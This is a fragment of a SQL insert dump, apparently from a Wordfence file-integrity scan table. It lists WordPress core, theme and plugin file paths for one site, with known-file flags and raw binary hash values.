('~VXA��&_�M�@em','wp-content/plugins/wordpress-seo/admin/class-export.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/admin/class-export.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��i��]�@5��|>�;','1g_\0h˦��i!�KN�.se~J�x*�@','',0,'?'),
('~V��Xa]�7p�|R','wp-includes/class-wp-post-type.php','/var/www/html/ictbank/blog/wp-includes/class-wp-post-type.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a�f�!���?>��,','�|��\\�%We���[�ӕ��H�7�n\Z�E���','',0,'?'),
('~^f=UP�����k1�','wp-content/plugins/wordpress-seo/src/initializers/migration-runner.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/initializers/migration-runner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R����\\��`t��','�;���6�n�����,�_��������FU�','',0,'?'),
('~i�I�;ݭ]�A��S','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/cacert.pem','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/cacert.pem',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','GPE�KT���Y�)&F��','���_�0d���}f!�v�m���EwW�o�','',0,'?'),
('~q�IP�I���r��','wp-includes/js/dist/vendor/wp-polyfill-node-contains.min.js','/var/www/html/ictbank/blog/wp-includes/js/dist/vendor/wp-polyfill-node-contains.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�eY����۬x2���Y','���g�Hn����~<�0^Ff88���.%x8','',0,'?'),
('~}�{ ��>D�}�<','wp-admin/css/code-editor.min.css','/var/www/html/ictbank/blog/wp-admin/css/code-editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�3�;�7��v:�P���','JlA��Z��q��F�v�<3�I^��k�','',0,'?'),
('~�b�g�mԇ��+�','wp-content/plugins/elementor-pro/assets/css/widget-mega-menu-rtl.min.css','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/assets/css/widget-mega-menu-rtl.min.css',0,'X��\"� �7���tQe','X��\"� �7���tQe','>�D��l/z�H�3i�x�����Pr��S�','',0,'?'),
('~��ReOX�f2��`�','wp-includes/class-wp-post.php','/var/www/html/ictbank/blog/wp-includes/class-wp-post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��6<b���Tr���','� m�\\��|+��3���´x�3V�wg','',0,'?'),
('~�C0��2�3*���J','wp-includes/blocks/more/editor.css','/var/www/html/ictbank/blog/wp-includes/blocks/more/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����w�.�,$�#>�','+�穩T^3=@��5��_���jzǼ[9+�N.�','',0,'?'),
('~��I�]:�}t��V���','wp-content/plugins/elementor/assets/shapes/opacity-fan.svg','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/shapes/opacity-fan.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>�gg��Npd�\n','Ȥ\n���;;��ԛmh(&ɪ>�����','',0,'?'),
('~���*S�̙e�','wp-admin/images/freedom-3.svg','/var/www/html/ictbank/blog/wp-admin/images/freedom-3.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��(�縫\ZX��֚�1l','集(���;�F�\n�k����Q���u�','',0,'?'),
('~�Pf��ԩ~1�LYw�','wp-includes/blocks/button/style-rtl.css','/var/www/html/ictbank/blog/wp-includes/blocks/button/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\'�W�k��bS','�E���%r��|��O�Y?M�b́�#g','',0,'?'),
('~�ݺ9i���U�|��','wp-content/plugins/elementor/assets/css/templates/frontend-lite.min.css','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/css/templates/frontend-lite.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$&���s�dR*\r�-b','tĵ�}�k!�,��\'R�+��>��p�챢!�','',0,'?'),
('~ť�s\0�1y�$�L}h','wp-config-sample.php','/var/www/html/ictbank/blog/wp-config-sample.php',0,'%L�~V����ܿ8]�','%L�~V����ܿ8]�',':���2=������ʙ���R�\\N�VL B\"','',0,'?'),
('~�Ӹbc��\Z$�@$��*','wp-content/plugins/wordfence/vendor/composer/autoload_real.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/vendor/composer/autoload_real.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8���b;�=YXJ)շ','���̆%\r���N�n_n�\'E�ݸږ�W{=D','',0,'?'),
('~����\n��\'��$�<','wp-includes/blocks/details/editor.css','/var/www/html/ictbank/blog/wp-includes/blocks/details/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z��$U�p��=','h��D0Dc���ErCQ��6&0�V�Lf�|љ\r','',0,'?'),
('~Δ�,z��G�h��','wp-content/uploads/woocommerce_uploads/index.html','/var/www/html/ictbank/blog/wp-content/uploads/woocommerce_uploads/index.html',0,'��ُ\0�� ��B~','��ُ\0�� ��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),
('�ldK����','wp-includes/js/dist/components.js','/var/www/html/ictbank/blog/wp-includes/js/dist/components.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�sD�^�U�W�y�','�^��H�A~�4H�p�^u~�F�B���^ {�','',0,'?'),
('�@��o=�z�<F�%','wp-content/plugins/wordpress-seo/js/dist/externals/componentsNew.js','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/js/dist/externals/componentsNew.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��E���*\Z�R@�#�R','�Z�P27��\r����++t�/�AR�I�V]<{f�','',0,'?'),
('.\\\\�JQ�-Y��','wp-content/plugins/wordpress-seo/src/exceptions/addon-installation/user-cannot-install-plugins-exception.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/exceptions/addon-installation/user-cannot-install-plugins-exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ѣ��f96*��/�i�','C��HaF�]��;\'P\\\'sn&�İ�n�B>�','',0,'?'),
('.��ʼn�����i','wp-content/plugins/elementor-pro/modules/woocommerce/classes/base-products-renderer.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/woocommerce/classes/base-products-renderer.php',0,'��> ��uF��%��','��> ��uF��%��','���(a���]�C^�/R�k�Z6�����)�','',0,'?'),
('6\0�O�kvzfTN','wp-includes/js/jquery/ui/effect-fold.js','/var/www/html/ictbank/blog/wp-includes/js/jquery/ui/effect-fold.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7&��<q!�<�9kS�Ѫ','7b.�Hƽ��[/\n�����3� G��O�','',0,'?'),
('6>��n�@��^�!g��','wp-content/themes/twentytwentyfour/theme.json','/var/www/html/ictbank/blog/wp-content/themes/twentytwentyfour/theme.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o������<�p$','�QF^k!\'�幨Lw�69ː�|�#�n;�N�$','',0,'?'),
('7�.ʋ5���1�','wp-content/plugins/wordpress-seo/src/generators/schema/person.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/generators/schema/person.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ǡR�v,�q�\r��2�','�L߆91��g���8ﮢ*`b5r�ĖO�ҕ','',0,'?'),
('@�={&����}�_','wp-content/plugins/wordfence/modules/login-security/classes/controller/ajax.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/modules/login-security/classes/controller/ajax.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`^ɤ=��R@\0>��d','}E�˷�N�.@��0� ���� ����','',0,'?'),
('B�2j70�/�zLq��','wp-includes/css/dist/block-library/classic-rtl.css','/var/www/html/ictbank/blog/wp-includes/css/dist/block-library/classic-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��dc5��?�','�����?�\"4�AH�CǓ����_/�','',0,'?'),
('J�Bk8��29T�a���','wp-content/plugins/wordfence/js/chart.umd.1722265817.js','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/js/chart.umd.1722265817.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b?���\\ٰ�YgD\rz','���Od� �:X��� RU�+�@��9','',0,'?'),
('c��J�w��eIO�Iq','wp-includes/blocks/cover/style-rtl.css','/var/www/html/ictbank/blog/wp-includes/blocks/cover/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y�0t&�t%)��:̘','��dY�,M}�s#4g.xdL�C� �q��^�Gl','',0,'?'),
('j&��^���b����','wp-includes/ms-settings.php','/var/www/html/ictbank/blog/wp-includes/ms-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~K1Zm�9�8�o[Ŋ','��*JlU�L��rbΘ���6k��OeH�D','',0,'?'),
('j^��SN�-O� �','wp-includes/css/dist/components/style.css','/var/www/html/ictbank/blog/wp-includes/css/dist/components/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y��}h�$��C\nۍ�','�ݥV�r\0j� �!ieVl˝1i����� \"u','',0,'?'),
('knp�x?y��D�<','wp-content/themes/twentytwentyfour/assets/images/icon-message.webp','/var/www/html/ictbank/blog/wp-content/themes/twentytwentyfour/assets/images/icon-message.webp',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}�-�����\0Y�v�','ᙬʢP�j�����O� �w[5���\\�C)u','',0,'?'),
('m�j�S*V���-oP','wp-content/plugins/elementor-pro/core/app/modules/import-export/module.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/core/app/modules/import-export/module.php',0,'�dNa���H��\\]jBQ','�dNa���H��\\]jBQ','�#���)4�=�����%�Y��~���uw�','',0,'?'),
('tS�\"��lZ�c��Q','wp-admin/js/auth-app.min.js','/var/www/html/ictbank/blog/wp-admin/js/auth-app.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','04��z��>�s�,\r','S�\\��|3m�4�:��ϭq��B��\r�7�','',0,'?'),
('|ďH��fwJck(�#','wp-content/plugins/elementor-pro/modules/theme-elements/widgets/post-info.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/theme-elements/widgets/post-info.php',0,'`�?Ɣo�g�m{���','`�?Ɣo�g�m{���','DQ���\'/�� �ĥ���GG�\Z����','',0,'?'),
('}BfkV�=�15l��g','wp-includes/blocks/avatar/editor.min.css','/var/www/html/ictbank/blog/wp-includes/blocks/avatar/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*���(\Z���Iz�','e2�,�Ք��e��n�C��L�]���s��+��','',0,'?'),
('��Uf�傘Z�c','wp-content/plugins/elementor/assets/js/packages/editor-documents/editor-documents.asset.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/js/packages/editor-documents/editor-documents.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��k�%Ѫ�HE)ϣ`','a�u��ﳭ�kxp�d`��{�\rCI\Zh?���','',0,'?'),
('�z���~48��l�Go8','wp-includes/js/dist/style-engine.min.js','/var/www/html/ictbank/blog/wp-includes/js/dist/style-engine.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^-}�T�yW#��:�e ','&F�ɂ���o�J��e�V\n��-3(��','',0,'?'),
('�D�8-���¤r�l','wp-content/plugins/wordfence/images/logos/shield-care.svg','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/images/logos/shield-care.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' � s�h߉\0��tv�','�f2\"(>�l�H93 ������ ��C$�<','',0,'?'),
('�\rvs�ޓ�[~f2c\\','wp-content/plugins/elementor-pro/modules/forms/fields/step.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/forms/fields/step.php',0,'�eP�l�\'���-','�eP�l�\'���-','0�ҧ=d��t������X\' Ѿ]�\0DV��','',0,'?'),
('��%G]f�@�%�Z��','wp-content/plugins/wordfence/views/common/section-subtitle.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/views/common/section-subtitle.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n^\r��#f��st��W\Z',':�taQE�&͜�����s١\nGb\\Z S1{�','',0,'?'),
('����zR������','wp-content/plugins/elementor-pro/modules/dynamic-tags/tags/archive-title.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/dynamic-tags/tags/archive-title.php',0,'���0�/4���mpp��','���0�/4���mpp��','��q�� �aG\n���f?��zv��S�','',0,'?'),
('Ƶ� -9��c�D�','wp-content/plugins/elementor/core/kits/documents/tabs/settings-page-transitions.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/core/kits/documents/tabs/settings-page-transitions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y��OV�A���n��','zc�ʼn�?�6E~�#up�,��f�l�$�f�','',0,'?'),
('�B��C;�st�3D/�','wp-content/plugins/wordpress-seo/src/exceptions/indexable/not-built-exception.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/exceptions/indexable/not-built-exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\ZW���� ���-�#','���X��왶ѓ��>���07��6��k�2','',0,'?'),
('�СqD֚?�i�X','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/utils.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/utils.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��M�y�W����n','D���Z_1dȐr��Fŷ���b� C*Ñ��','',0,'?'),
('�K�Q�}U&;&���Q','wp-includes/meta.php','/var/www/html/ictbank/blog/wp-includes/meta.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8 ˒Z�\'�ojd�\0�','2�A��j\\5���\r*�R���G�d,�@L�6K�','',0,'?'),
('�tr�εF_� ���','wp-includes/js/wp-emoji-loader.js','/var/www/html/ictbank/blog/wp-includes/js/wp-emoji-loader.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V�t�\ZUO7l��s:\Z�','��D`�%�Å�9_�]M%�v���zVxZ�(\0�','',0,'?'),
('�ؖ��\\z����','wp-content/plugins/wordpress-seo/vendor_prefixed/symfony/dependency-injection/Exception/ServiceNotFoundException.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/vendor_prefixed/symfony/dependency-injection/Exception/ServiceNotFoundException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b����h\\�o�R���','�,�7=T�3�*rZ\\�����7�yaX&Dt�z','',0,'?'),
('��1��OK��~w��w','wp-content/plugins/elementor/assets/css/widget-menu-anchor-rtl.min.css','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/css/widget-menu-anchor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N;�M��Ges�S5�A�B','�Ӕ���Z�+p���5M�c��qA�]�VJ��z','',0,'?'),
('�͍�����ρb�B','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Ed25519.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:�CVF���ІR',',)���|F��a��悃��f��>��;J��\\','',0,'?'),
('��pb�����ܗ','wp-content/plugins/wordpress-seo/js/dist/crawl-settings.js','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/js/dist/crawl-settings.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E3�bH�Wu��ܴ�P�','j�9���f�p*���prOr�$ ��','',0,'?'),
('���E\'�Hg�C\\�','wp-content/plugins/elementor/includes/controls/slider.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/includes/controls/slider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�yh�G9�C����','���t���L�6G�M(�\'H.�n���ĕ{��','',0,'?'),
('�:?˨��IX����','wp-content/plugins/syntaxhighlighter/syntaxhighlighter2/scripts/shBrushPlain.js','/var/www/html/ictbank/blog/wp-content/plugins/syntaxhighlighter/syntaxhighlighter2/scripts/shBrushPlain.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�w�F6�/>�1','&�S��K ���F��\r�<�P��$̰�s�-��','',0,'?'),
('�&Ƀ$����(z����','wp-content/plugins/wordpress-seo/src/generators/open-graph-image-generator.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/generators/open-graph-image-generator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'ei�K, �?��,�','n�4�w:��K�C�AFM��T��f2��[','',0,'?'),
('�3-�����f��\n','wp-includes/css/dist/list-reusable-blocks/style-rtl.css','/var/www/html/ictbank/blog/wp-includes/css/dist/list-reusable-blocks/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Oͤ20�u\Z����3','��\"ֱ<�WC�հ����}���_�^���X�','',0,'?'),
('�7�}���P�$�hm','wp-content/plugins/elementor-pro/assets/js/woocommerce-menu-cart.faa7b80e9ba9e5072070.bundle.min.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/assets/js/woocommerce-menu-cart.faa7b80e9ba9e5072070.bundle.min.js',0,'vy���:̰\'ں��','vy���:̰\'ں��','�/�.s�` Rfht\"����+�A���%�I','',0,'?'),
('�;��!1�>�Y�xQ�','wp-includes/js/dist/block-editor.js','/var/www/html/ictbank/blog/wp-includes/js/dist/block-editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��v[�� ͡?_���o�','F ���ʰz>1�j`�ʠjy��A���','',0,'?'),
('�AL���,%�+��','wp-content/plugins/elementor-pro/modules/notes/data/endpoints/summary-endpoint.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/notes/data/endpoints/summary-endpoint.php',0,'WT��L��O^����_�','WT��L��O^����_�','W��#-��k\rzVCs\ZG��� n2����U~','',0,'?'),
('�Lk��k��B� ��','wp-content/plugins/wordfence/css/license/premium-global.1722265817.css','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/css/license/premium-global.1722265817.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','٬5�&���]U��\0','=:I��#_A�\\R���֣X��F��SO��re�c','',0,'?'),
('�X����Kk��#�/��K','wp-content/plugins/elementor/assets/js/packages/editor-app-bar/editor-app-bar.asset.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/js/packages/editor-app-bar/editor-app-bar.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�>�뭬��h8','(�$���/\0�*@�\Z���n�\'�#����#�','',0,'?'),
('�Zd���O�r2��k�.','wp-content/plugins/elementor/assets/js/packages/ui/ui.min.js.LICENSE.txt','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/js/packages/ui/ui.min.js.LICENSE.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0�\Z!�&+fQs��:f','�$s�f�|B-���w�+�ci�gT�������','',0,'?'),
('�_��5\Z$�Ɵ\r?�','wp-content/plugins/elementor/data/manager.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/data/manager.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��5�\n����)2�','��E��3��N�`�@\n��*��\rV� D','',0,'?'),
('�b���G}���KY�','wp-content/plugins/elementor-pro/assets/css/templates/widget-video-playlist.min.css','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/assets/css/templates/widget-video-playlist.min.css',0,'��\Z��J��#��k�7','��\Z��J��#��k�7','u_�Bb���^�&>!)�/��ٵ�toYϩ�Ht��','',0,'?'),
('�x�ܟ����B��I�','wp-content/plugins/elementor/assets/lib/font-awesome/json/brands.json','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/lib/font-awesome/json/brands.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:b��m�q)HB�T\\','V�F×&ަ�.�;����/��Y�ӡ�','',0,'?'),
('��㪢?�g��X�]e','wp-content/plugins/elementor/modules/home/transformations/base/transformations-abstract.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/modules/home/transformations/base/transformations-abstract.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�£IqG�f��\r','P%�Hi��z�K�F&1�7�S2��p68\"d�N��l','',0,'?'),
('��B��z��qt����','wp-content/plugins/wordpress-seo/js/dist/indexation.js','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/js/dist/indexation.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G���-)�R�7?�\n','�:r]�\r���F!2���}��S��m�D{x��','',0,'?'),
('��ah�#��8�c���','wp-includes/js/tinymce/themes/inlite/theme.js','/var/www/html/ictbank/blog/wp-includes/js/tinymce/themes/inlite/theme.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4O��DIc`��EJ','p�v�T5Z>j��j�\0\0��f��xa/g=�&�','',0,'?'),
('��#��\\7��\ZhG�l�','wp-includes/blocks/post-navigation-link/style.min.css','/var/www/html/ictbank/blog/wp-includes/blocks/post-navigation-link/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r[�u��׀?�vFq!u','��R���/(+\" ~$W��\r@]c=�@Jw\Z�G','',0,'?'),
('���t��~��$\r�','wp-content/plugins/elementor/assets/css/widget-star-rating-rtl.min.css','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/css/widget-star-rating-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S��x�G��lw��3','�(L��W�91%e��3]�E#\07�T���','',0,'?'),
('���r=����c���Mz','wp-includes/js/dist/is-shallow-equal.min.js','/var/www/html/ictbank/blog/wp-includes/js/dist/is-shallow-equal.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%+$d=�,�.)','yQ��9I%���H4���B��t�5�)','',0,'?'),
('��Aп��F\'��Y�','wp-content/plugins/elementor/assets/js/packages/env/env.strings.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/js/packages/env/env.strings.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0�� ��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),
('��% �+�곂4�{:','wp-content/plugins/wordfence/modules/login-security/classes/utility/serialization.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/modules/login-security/classes/utility/serialization.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o�ѕbY�R�����','�tiioP7,�R|�q�X��)ᆊ�Ǯf�@Kv� ','',0,'?'),
('����0ႝ���}�1','wp-content/plugins/wordfence/css/jquery-ui.min.1722265817.css','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/css/jquery-ui.min.1722265817.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}O�^�0tGG��Q','�ٍ$rb=p�h�x�K��5]8�Q���R��jn4','',0,'?'),
('���!��h\Z�ɨ$\"R','wp-includes/css/dist/edit-site/style.css','/var/www/html/ictbank/blog/wp-includes/css/dist/edit-site/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[1�)�4`>�q��&O','�o�ӯ0]��Ę���[\'�K���&���M/�Nj','',0,'?'),
('��ں�u���M���[\r','wp-admin/images/wpspin_light-2x.gif','/var/www/html/ictbank/blog/wp-admin/images/wpspin_light-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{�%�-�E�;����|','�u)��J�A�92���$��N�8�����\'F','',0,'?'),
('��Nx��ډ\Z�8yH\\�','wp-admin/js/theme-plugin-editor.min.js','/var/www/html/ictbank/blog/wp-admin/js/theme-plugin-editor.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?tS��~5��~���','�w�T�}υ��*e�}�v�W�*!�E���H','',0,'?'),
('��sSk�i�<4\'c�-6','wp-includes/js/wp-embed.js','/var/www/html/ictbank/blog/wp-includes/js/wp-embed.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�wbs�xg�p��)q2*','�.��b��$-\'�w�P\\/����\"O���XH','',0,'?'),
('���)e��.��\nO�','wp-content/plugins/wordpress-seo/images/video_plugin_assistant.svg','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/images/video_plugin_assistant.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"��0�GiQf���i6�','�<� 2�6^S�]įA��-�0L�}��2�` P�','',0,'?'),
('�����^VjLZX�8t��','wp-content/plugins/wordpress-seo/src/integrations/admin/addon-installation/installation-integration.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/integrations/admin/addon-installation/installation-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?j(X%U�Ġ�c','G�Ն!nG�A��M�^(��0�*p�H��;���','',0,'?'),
('���e��97�aJS','wp-includes/images/smilies/icon_smile.gif','/var/www/html/ictbank/blog/wp-includes/images/smilies/icon_smile.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3�.)�2���p���','ˠ�\",�Rʨ�Tr=�o��r�З:����','',0,'?'),
('���7�::��*��F�','wp-content/plugins/elementor/core/editor/loader/editor-loader-interface.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/core/editor/loader/editor-loader-interface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�bIh~�7�ߏ�\0','��XM� \0Ө�ri9����VW���N��E9�','',0,'?'),
('��XQ���d9r�ڼ��','wp-includes/customize/class-wp-customize-themes-section.php','/var/www/html/ictbank/blog/wp-includes/customize/class-wp-customize-themes-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��.X�:>�Y��','�`x��0�yy�[]^����ݚ��U���gL','',0,'?'),
('��U�hgM� �dnQ','wp-content/plugins/elementor/core/files/file-types/base.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/core/files/file-types/base.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Og����(�Է��tV','͊}3�;e���`q\\��P�\"�~�O~�.N��','',0,'?'),
('�cdcƚq�~�%��','wp-includes/blocks/navigation-link/block.json','/var/www/html/ictbank/blog/wp-includes/blocks/navigation-link/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i&�Ѷ��R���p%�','���D�.rO��� <�Bd�Z�h�8\r~W]','',0,'?'),
('�go�@>3:ۏՍ�h','wp-content/plugins/wordpress-seo/inc/class-wpseo-replacement-variable.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/inc/class-wpseo-replacement-variable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��>����\'%�bC��','|�.�#���f��Z�Z��Y 9��~���\Zr�K','',0,'?'),
('��\\yZ��mrN��Xk','wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shBrushDelphi.js','/var/www/html/ictbank/blog/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shBrushDelphi.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z̽�\"5���x��a=','�Q�xф�����Ϫr\n��֍�Dzk4�','',0,'?'),
('��2\'����|YVg��','wp-content/plugins/elementor/assets/js/web-cli.min.js.LICENSE.txt','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/js/web-cli.min.js.LICENSE.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N4�e���;�z❝o','��%H(�K%��?���G�0[E�����','',0,'?'),
('�%\Z����Tc.�FG','wp-content/plugins/wordfence/css/license/premium.1722265817.css','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/css/license/premium.1722265817.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z��+DqK�ҍU','�җ�d��U�A�E���qm�:,�*�ɕ','',0,'?'),
('�&W^\Z7ɿ�n`�X\"�','wp-content/plugins/elementor/modules/history/views/history-panel-template.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/modules/history/views/history-panel-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';�uO�gV[��P6l/','<����C;�n\\WM(8T��z��؈p4�����U','',0,'?'),
('�. ΟhO���w9�x�','wp-content/plugins/elementor/assets/js/152486453d0e39071cdb.bundle.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/js/152486453d0e39071cdb.bundle.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�������Ӆ>#��F','��558�v��->,��(xs����������J','',0,'?'),
('�=^ԉRu39M%�!�','wp-content/plugins/wordpress-seo/src/integrations/admin/migration-error-integration.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/integrations/admin/migration-error-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r ؈��\Z���_W28','v�*��G���\r$��E�Z�:۞��f��','',0,'?'),
